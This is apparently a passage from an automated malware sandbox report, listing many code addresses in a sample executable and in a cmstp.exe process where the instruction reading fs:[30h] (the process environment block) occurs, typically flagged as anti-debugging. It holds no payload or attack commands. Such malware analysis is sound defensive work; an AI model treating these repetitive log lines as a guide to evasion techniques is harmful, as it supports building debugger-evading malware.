          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2C600 mov eax, dword ptr fs:[00000030h]2_2_00A2C600
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A58E00 mov eax, dword ptr fs:[00000030h]2_2_00A58E00
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1608 mov eax, dword ptr fs:[00000030h]2_2_00AE1608
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5A61C mov eax, dword ptr fs:[00000030h]2_2_00A5A61C
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5A61C mov eax, dword ptr fs:[00000030h]2_2_00A5A61C
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3766D mov eax, dword ptr fs:[00000030h]2_2_00A3766D
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4AE73 mov eax, dword ptr fs:[00000030h]2_2_00A4AE73
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4AE73 mov eax, dword ptr fs:[00000030h]2_2_00A4AE73
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4AE73 mov eax, dword ptr fs:[00000030h]2_2_00A4AE73
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4AE73 mov eax, dword ptr fs:[00000030h]2_2_00A4AE73
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4AE73 mov eax, dword ptr fs:[00000030h]2_2_00A4AE73
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]2_2_00A37E41
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]2_2_00A37E41
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]2_2_00A37E41
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]2_2_00A37E41
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]2_2_00A37E41
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]2_2_00A37E41
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEAE44 mov eax, dword ptr fs:[00000030h]2_2_00AEAE44
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEAE44 mov eax, dword ptr fs:[00000030h]2_2_00AEAE44
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A38794 mov eax, dword ptr fs:[00000030h]2_2_00A38794
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA7794 mov eax, dword ptr fs:[00000030h]2_2_00AA7794
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA7794 mov eax, dword ptr fs:[00000030h]2_2_00AA7794
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA7794 mov eax, dword ptr fs:[00000030h]2_2_00AA7794
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A637F5 mov eax, dword ptr fs:[00000030h]2_2_00A637F5
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A24F2E mov eax, dword ptr fs:[00000030h]2_2_00A24F2E
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A24F2E mov eax, dword ptr fs:[00000030h]2_2_00A24F2E
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5E730 mov eax, dword ptr fs:[00000030h]2_2_00A5E730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04732073 mov eax, dword ptr fs:[00000030h]7_2_04732073
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04741074 mov eax, dword ptr fs:[00000030h]7_2_04741074
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469746D mov eax, dword ptr fs:[00000030h]7_2_0469746D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470C450 mov eax, dword ptr fs:[00000030h]7_2_0470C450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470C450 mov eax, dword ptr fs:[00000030h]7_2_0470C450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AA44B mov eax, dword ptr fs:[00000030h]7_2_046AA44B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04690050 mov eax, dword ptr fs:[00000030h]7_2_04690050
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04690050 mov eax, dword ptr fs:[00000030h]7_2_04690050
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468B02A mov eax, dword ptr fs:[00000030h]7_2_0468B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468B02A mov eax, dword ptr fs:[00000030h]7_2_0468B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468B02A mov eax, dword ptr fs:[00000030h]7_2_0468B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468B02A mov eax, dword ptr fs:[00000030h]7_2_0468B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046ABC2C mov eax, dword ptr fs:[00000030h]7_2_046ABC2C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A002D mov eax, dword ptr fs:[00000030h]7_2_046A002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A002D mov eax, dword ptr fs:[00000030h]7_2_046A002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A002D mov eax, dword ptr fs:[00000030h]7_2_046A002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A002D mov eax, dword ptr fs:[00000030h]7_2_046A002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A002D mov eax, dword ptr fs:[00000030h]7_2_046A002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04744015 mov eax, dword ptr fs:[00000030h]7_2_04744015
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04744015 mov eax, dword ptr fs:[00000030h]7_2_04744015
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6C0A mov eax, dword ptr fs:[00000030h]7_2_046F6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6C0A mov eax, dword ptr fs:[00000030h]7_2_046F6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6C0A mov eax, dword ptr fs:[00000030h]7_2_046F6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6C0A mov eax, dword ptr fs:[00000030h]7_2_046F6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]7_2_04731C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]7_2_04731C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]7_2_04731C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]7_2_04731C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]7_2_04731C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]7_2_04731C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]7_2_04731C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]7_2_04731C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]7_2_04731C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]7_2_04731C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]7_2_04731C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]7_2_04731C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]7_2_04731C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]7_2_04731C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F7016 mov eax, dword ptr fs:[00000030h]7_2_046F7016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F7016 mov eax, dword ptr fs:[00000030h]7_2_046F7016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F7016 mov eax, dword ptr fs:[00000030h]7_2_046F7016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0474740D mov eax, dword ptr fs:[00000030h]7_2_0474740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0474740D mov eax, dword ptr fs:[00000030h]7_2_0474740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0474740D mov eax, dword ptr fs:[00000030h]7_2_0474740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047314FB mov eax, dword ptr fs:[00000030h]7_2_047314FB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046758EC mov eax, dword ptr fs:[00000030h]7_2_046758EC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6CF0 mov eax, dword ptr fs:[00000030h]7_2_046F6CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6CF0 mov eax, dword ptr fs:[00000030h]7_2_046F6CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6CF0 mov eax, dword ptr fs:[00000030h]7_2_046F6CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov eax, dword ptr fs:[00000030h]7_2_0470B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov ecx, dword ptr fs:[00000030h]7_2_0470B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov eax, dword ptr fs:[00000030h]7_2_0470B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov eax, dword ptr fs:[00000030h]7_2_0470B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov eax, dword ptr fs:[00000030h]7_2_0470B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov eax, dword ptr fs:[00000030h]7_2_0470B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04748CD6 mov eax, dword ptr fs:[00000030h]7_2_04748CD6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B90AF mov eax, dword ptr fs:[00000030h]7_2_046B90AF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]7_2_046A20A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]7_2_046A20A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]7_2_046A20A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]7_2_046A20A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]7_2_046A20A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]7_2_046A20A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AF0BF mov ecx, dword ptr fs:[00000030h]7_2_046AF0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AF0BF mov eax, dword ptr fs:[00000030h]7_2_046AF0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AF0BF mov eax, dword ptr fs:[00000030h]7_2_046AF0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679080 mov eax, dword ptr fs:[00000030h]7_2_04679080
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F3884 mov eax, dword ptr fs:[00000030h]7_2_046F3884
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F3884 mov eax, dword ptr fs:[00000030h]7_2_046F3884
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468849B mov eax, dword ptr fs:[00000030h]7_2_0468849B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467C962 mov eax, dword ptr fs:[00000030h]7_2_0467C962
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467B171 mov eax, dword ptr fs:[00000030h]7_2_0467B171
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467B171 mov eax, dword ptr fs:[00000030h]7_2_0467B171
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469C577 mov eax, dword ptr fs:[00000030h]7_2_0469C577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469C577 mov eax, dword ptr fs:[00000030h]7_2_0469C577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B3D43 mov eax, dword ptr fs:[00000030h]7_2_046B3D43
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469B944 mov eax, dword ptr fs:[00000030h]7_2_0469B944
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469B944 mov eax, dword ptr fs:[00000030h]7_2_0469B944
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F3540 mov eax, dword ptr fs:[00000030h]7_2_046F3540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04697D50 mov eax, dword ptr fs:[00000030h]7_2_04697D50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04748D34 mov eax, dword ptr fs:[00000030h]7_2_04748D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04694120 mov eax, dword ptr fs:[00000030h]7_2_04694120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04694120 mov eax, dword ptr fs:[00000030h]7_2_04694120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04694120 mov eax, dword ptr fs:[00000030h]7_2_04694120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04694120 mov eax, dword ptr fs:[00000030h]7_2_04694120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04694120 mov ecx, dword ptr fs:[00000030h]7_2_04694120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473E539 mov eax, dword ptr fs:[00000030h]7_2_0473E539
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A513A mov eax, dword ptr fs:[00000030h]7_2_046A513A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A513A mov eax, dword ptr fs:[00000030h]7_2_046A513A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A4D3B mov eax, dword ptr fs:[00000030h]7_2_046A4D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A4D3B mov eax, dword ptr fs:[00000030h]7_2_046A4D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A4D3B mov eax, dword ptr fs:[00000030h]7_2_046A4D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467AD30 mov eax, dword ptr fs:[00000030h]7_2_0467AD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046FA537 mov eax, dword ptr fs:[00000030h]7_2_046FA537
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]7_2_04683D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]7_2_04683D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]7_2_04683D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]7_2_04683D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]7_2_04683D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]7_2_04683D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]7_2_04683D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]7_2_04683D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]7_2_04683D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]7_2_04683D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]7_2_04683D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]7_2_04683D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]7_2_04683D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679100 mov eax, dword ptr fs:[00000030h]7_2_04679100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679100 mov eax, dword ptr fs:[00000030h]7_2_04679100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679100 mov eax, dword ptr fs:[00000030h]7_2_04679100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04728DF1 mov eax, dword ptr fs:[00000030h]7_2_04728DF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467B1E1 mov eax, dword ptr fs:[00000030h]7_2_0467B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467B1E1 mov eax, dword ptr fs:[00000030h]7_2_0467B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467B1E1 mov eax, dword ptr fs:[00000030h]7_2_0467B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468D5E0 mov eax, dword ptr fs:[00000030h]7_2_0468D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468D5E0 mov eax, dword ptr fs:[00000030h]7_2_0468D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473FDE2 mov eax, dword ptr fs:[00000030h]7_2_0473FDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473FDE2 mov eax, dword ptr fs:[00000030h]7_2_0473FDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473FDE2 mov eax, dword ptr fs:[00000030h]7_2_0473FDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473FDE2 mov eax, dword ptr fs:[00000030h]7_2_0473FDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047041E8 mov eax, dword ptr fs:[00000030h]7_2_047041E8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov eax, dword ptr fs:[00000030h]7_2_046F6DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov eax, dword ptr fs:[00000030h]7_2_046F6DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov eax, dword ptr fs:[00000030h]7_2_046F6DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov ecx, dword ptr fs:[00000030h]7_2_046F6DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov eax, dword ptr fs:[00000030h]7_2_046F6DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov eax, dword ptr fs:[00000030h]7_2_046F6DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F69A6 mov eax, dword ptr fs:[00000030h]7_2_046F69A6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A61A0 mov eax, dword ptr fs:[00000030h]7_2_046A61A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A61A0 mov eax, dword ptr fs:[00000030h]7_2_046A61A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A35A1 mov eax, dword ptr fs:[00000030h]7_2_046A35A1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F51BE mov eax, dword ptr fs:[00000030h]7_2_046F51BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F51BE mov eax, dword ptr fs:[00000030h]7_2_046F51BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F51BE mov eax, dword ptr fs:[00000030h]7_2_046F51BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F51BE mov eax, dword ptr fs:[00000030h]7_2_046F51BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047405AC mov eax, dword ptr fs:[00000030h]7_2_047405AC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047405AC mov eax, dword ptr fs:[00000030h]7_2_047405AC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A1DB5 mov eax, dword ptr fs:[00000030h]7_2_046A1DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A1DB5 mov eax, dword ptr fs:[00000030h]7_2_046A1DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A1DB5 mov eax, dword ptr fs:[00000030h]7_2_046A1DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469C182 mov eax, dword ptr fs:[00000030h]7_2_0469C182
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2581 mov eax, dword ptr fs:[00000030h]7_2_046A2581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2581 mov eax, dword ptr fs:[00000030h]7_2_046A2581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2581 mov eax, dword ptr fs:[00000030h]7_2_046A2581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2581 mov eax, dword ptr fs:[00000030h]7_2_046A2581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04672D8A mov eax, dword ptr fs:[00000030h]7_2_04672D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04672D8A mov eax, dword ptr fs:[00000030h]7_2_04672D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04672D8A mov eax, dword ptr fs:[00000030h]7_2_04672D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04672D8A mov eax, dword ptr fs:[00000030h]7_2_04672D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04672D8A mov eax, dword ptr fs:[00000030h]7_2_04672D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AA185 mov eax, dword ptr fs:[00000030h]7_2_046AA185
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AFD9B mov eax, dword ptr fs:[00000030h]7_2_046AFD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AFD9B mov eax, dword ptr fs:[00000030h]7_2_046AFD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2990 mov eax, dword ptr fs:[00000030h]7_2_046A2990
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468766D mov eax, dword ptr fs:[00000030h]7_2_0468766D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B927A mov eax, dword ptr fs:[00000030h]7_2_046B927A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0472B260 mov eax, dword ptr fs:[00000030h]7_2_0472B260
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0472B260 mov eax, dword ptr fs:[00000030h]7_2_0472B260
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04748A62 mov eax, dword ptr fs:[00000030h]7_2_04748A62
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469AE73 mov eax, dword ptr fs:[00000030h]7_2_0469AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469AE73 mov eax, dword ptr fs:[00000030h]7_2_0469AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469AE73 mov eax, dword ptr fs:[00000030h]7_2_0469AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469AE73 mov eax, dword ptr fs:[00000030h]7_2_0469AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469AE73 mov eax, dword ptr fs:[00000030h]7_2_0469AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473EA55 mov eax, dword ptr fs:[00000030h]7_2_0473EA55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679240 mov eax, dword ptr fs:[00000030h]7_2_04679240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679240 mov eax, dword ptr fs:[00000030h]7_2_04679240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679240 mov eax, dword ptr fs:[00000030h]7_2_04679240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679240 mov eax, dword ptr fs:[00000030h]7_2_04679240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04704257 mov eax, dword ptr fs:[00000030h]7_2_04704257
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]7_2_04687E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]7_2_04687E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]7_2_04687E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]7_2_04687E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]7_2_04687E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]7_2_04687E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473AE44 mov eax, dword ptr fs:[00000030h]7_2_0473AE44
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473AE44 mov eax, dword ptr fs:[00000030h]7_2_0473AE44
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467E620 mov eax, dword ptr fs:[00000030h]7_2_0467E620
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B4A2C mov eax, dword ptr fs:[00000030h]7_2_046B4A2C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B4A2C mov eax, dword ptr fs:[00000030h]7_2_046B4A2C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0472FE3F mov eax, dword ptr fs:[00000030h]7_2_0472FE3F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04688A0A mov eax, dword ptr fs:[00000030h]7_2_04688A0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467C600 mov eax, dword ptr fs:[00000030h]7_2_0467C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467C600 mov eax, dword ptr fs:[00000030h]7_2_0467C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467C600 mov eax, dword ptr fs:[00000030h]7_2_0467C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A8E00 mov eax, dword ptr fs:[00000030h]7_2_046A8E00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467AA16 mov eax, dword ptr fs:[00000030h]7_2_0467AA16
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467AA16 mov eax, dword ptr fs:[00000030h]7_2_0467AA16
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04693A1C mov eax, dword ptr fs:[00000030h]7_2_04693A1C
